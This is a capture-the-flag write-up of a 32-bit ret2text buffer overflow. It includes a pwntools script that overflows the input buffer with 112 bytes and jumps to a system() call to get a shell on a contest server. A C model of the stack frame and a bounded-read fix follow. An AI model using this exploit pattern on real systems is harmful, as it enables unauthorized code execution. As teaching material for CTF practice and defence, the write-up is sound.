Problem: [Qinghai Minzu University 2025 Freshman Contest] Sign-in Challenge 2
Approach
- Dynamic debugging showed that the offset from the input point to the return address is 112 (this has to be measured with a debugger; the offset IDA displays is wrong, because IDA's stack view reports the buffer's distance from the frame pointer as it reconstructs it statically, which does not by itself account for the saved ebp and any alignment padding that sit between the buffer and the saved return address). The secure function calls system, so we simply overwrite the return address with the address of the instructions in secure that call system.
EXP
```python
#coding=utf-8
from pwn import *
#-------------------------------------------------------------------#
#context(arch = 'amd64', os = 'linux', log_level = 'debug')
#context(arch = 'i386', os = 'linux', log_level = 'debug')
context.log_level = 'debug'
Address = 'node1.anna.nssctf.cn'
Port = 28587
io = remote(Address, Port)
#io = process('./pwn')
#-------------------------------------------------------------------#
# Leak helpers from the template; not needed for this challenge.
def get_addr64():
    return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def get_addr32():
    return u32(io.recvuntil(b'\xf7')[-4:])
#-------------------------------------------------------------------#
system = 0x804863A                      # address in secure() where system is called
payload = cyclic(112) + p32(system)     # 112 bytes to the return address (measured in gdb), then the target
io.recvuntil(b"There is something amazing here, do you know anything?\n")  # bytes, not str, under Python 3
io.sendline(payload)
io.interactive()
```
Summary
This is a very basic ret2text challenge; the details are up to you to get right.
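The approach section says the return-address offset measured in gdb (112) is not the buffer size IDA reports. The following C program is an added illustration, not part of the original write-up or of the challenge binary: it models a 32-bit stack frame whose layout is an assumption chosen so that the numbers match the ones on the page (a 0x68-byte buffer, 4 bytes of alignment padding, the saved ebp, then the return address), and it puts the unbounded-read pattern that makes ret2text possible beside a bounded read that cannot reach the return address. The struct and all function names are hypothetical.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed 32-bit frame layout (a model, not a dump of the challenge binary):
 * IDA reports the buffer at ebp-0x68 (104 bytes), but the distance from the
 * first byte of the buffer to the saved return address is 112 when measured
 * in gdb. One layout that produces exactly that is a 104-byte buffer, 4 bytes
 * of alignment padding, a 4-byte saved ebp, then the return address. */
struct frame32 {
    char     buf[0x68];      /* the 0x68 bytes a static view shows */
    uint8_t  pad[4];         /* alignment padding the static view omits */
    uint32_t saved_ebp;      /* pushed by the callee prologue */
    uint32_t ret_addr;       /* the value a ret2text overwrite replaces */
};

/* Distance from the first byte of the input buffer to the return address. */
size_t ret_offset(void) {
    return offsetof(struct frame32, ret_addr);   /* 112 under this layout */
}

/* Would input_len bytes reach past the buffer and clobber the return address
 * when the read is unbounded (gets, scanf("%s"), read with a large length)? */
int overwrites_return(size_t input_len) {
    return input_len > ret_offset();
}

/* Hardened read: bounded by the buffer capacity, so no amount of input can
 * reach saved ebp or the return address. Returns the number of bytes stored. */
size_t bounded_read(char *dst, size_t cap, const char *src, size_t src_len) {
    size_t n = src_len < cap - 1 ? src_len : cap - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return n;
}

/* Demo helper: feed src_len constructed 'A' bytes through bounded_read into
 * a 0x68-byte buffer and report how many were actually stored. */
size_t bounded_demo(size_t src_len) {
    char buf[0x68];
    char src[256];
    if (src_len > sizeof src) src_len = sizeof src;
    memset(src, 'A', src_len);
    return bounded_read(buf, sizeof buf, src, src_len);
}

int main(void) {
    /* Constructed input of the same shape as the write-up's payload:
     * 112 bytes of padding followed by a 4-byte value. */
    size_t payload_len = 112 + 4;
    printf("offset to return address: %zu\n", ret_offset());
    printf("%zu-byte unbounded input overwrites ret: %d\n",
           payload_len, overwrites_return(payload_len));
    printf("bounded read stored only %zu of %zu bytes\n",
           bounded_demo(payload_len), payload_len);
    return 0;
}
```

The point of the model is the gap between sizeof(buf) and ret_offset(): a static tool can tell you the former, only the running process tells you the latter, which is why the write-up insists on measuring in a debugger. The bounded read shows the fix on the defensive side: when the copy length is capped at the buffer capacity, the padding, saved ebp and return address are never written, regardless of input size.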

Why is the 0x68 offset I found in IDA wrong? I'm not good at dynamic debugging. Not being able to solve a sign-in challenge is so frustrating...